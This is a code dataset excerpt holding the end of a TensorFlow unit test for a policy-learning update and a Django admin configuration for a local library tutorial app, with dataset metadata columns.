tf.zeros([num_info_sets, num_actions]))
initial_cur = tf.constant([[0.50621, 0., 0.49379],
[0.333333, 0.333333, 0.333333]])
self.assertAllClose(initial_cur, patient.cur())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.avg())
self.assertAllClose(
tf.fill([num_info_sets, num_actions], 1.0 / num_actions),
patient.policy())
def env(policy):
return tf.random.normal(
shape=[num_info_sets, num_actions]) * policy
patient.update(env)
next_cur = tf.constant([[0.39514, 0., 0.60486],
[0.333333, 0.333333, 0.333333]])
self.assertAllClose(next_cur, patient.cur())
self.assertAllClose(initial_cur, patient.avg())
self.assertAllClose(initial_cur, patient.policy())
patient.update(env)
next_next_cur = [[0., 0., 1.], [0.333333, 0.333333, 0.333333]]
self.assertAllClose(next_next_cur, patient.cur())
self.assertAllClose((initial_cur + next_cur) / 2.0, patient.avg())
self.assertAllClose((initial_cur + next_cur) / 2.0, patient.policy())
if __name__ == '__main__':
tf.test.main()
| true | true |
f7fa5d46732df96a84ddbc17c5a4b4cd7b4ec96a | 1,160 | py | Python | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | catalog/admin.py | kainar1823/django_local_library | 92ad9d4d008fad4ff11c016d0747d618059c3144 | [
"Unlicense"
] | null | null | null | from django.contrib import admin
from .models import Author, Genre, Book, BookInstance
# admin.site.register(Genre)
# admin.site.register(Author)
# admin.site.register(Book)
# admin.site.register(BookInstance)
@admin.register(Genre)
class GenreAdmin(admin.ModelAdmin):
pass
@admin.register(Author)
class AuthorAdmin(admin.ModelAdmin):
list_display = ('last_name', 'first_name',
'date_of_birth', 'date_of_death')
fields = ['first_name', 'last_name', ('date_of_birth', 'date_of_death')]
class BooksInstanceInline(admin.TabularInline):
model = BookInstance
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
list_display = ('title', 'author', 'display_genre')
inlines = [BooksInstanceInline]
@admin.register(BookInstance)
class BookInstance(admin.ModelAdmin):
list_filter = ('status', 'due_back')
list_display = ('book', 'status', 'borrower',
'due_back', 'is_overdue', 'id')
fieldsets = (
(None, {
'fields': ('book', 'imprint', 'id')
}),
('Availability', {
'fields': ('status', 'due_back', 'borrower')
}),
)
| 24.680851 | 76 | 0.643966 | from django.contrib import admin
from .models import Author, Genre, Book, BookInstance
@admin.register(Genre)
class GenreAdmin(admin.ModelAdmin):
pass
@admin.register(Author)
class AuthorAdmin(admin.ModelAdmin):
list_display = ('last_name', 'first_name',
'date_of_birth', 'date_of_death')
fields = ['first_name', 'last_name', ('date_of_birth', 'date_of_death')]
class BooksInstanceInline(admin.TabularInline):
model = BookInstance
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
list_display = ('title', 'author', 'display_genre')
inlines = [BooksInstanceInline]
@admin.register(BookInstance)
class BookInstance(admin.ModelAdmin):
list_filter = ('status', 'due_back')
list_display = ('book', 'status', 'borrower',
'due_back', 'is_overdue', 'id')
fieldsets = (
(None, {
'fields': ('book', 'imprint', 'id')
}),
('Availability', {
'fields': ('status', 'due_back', 'borrower')
}),
)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.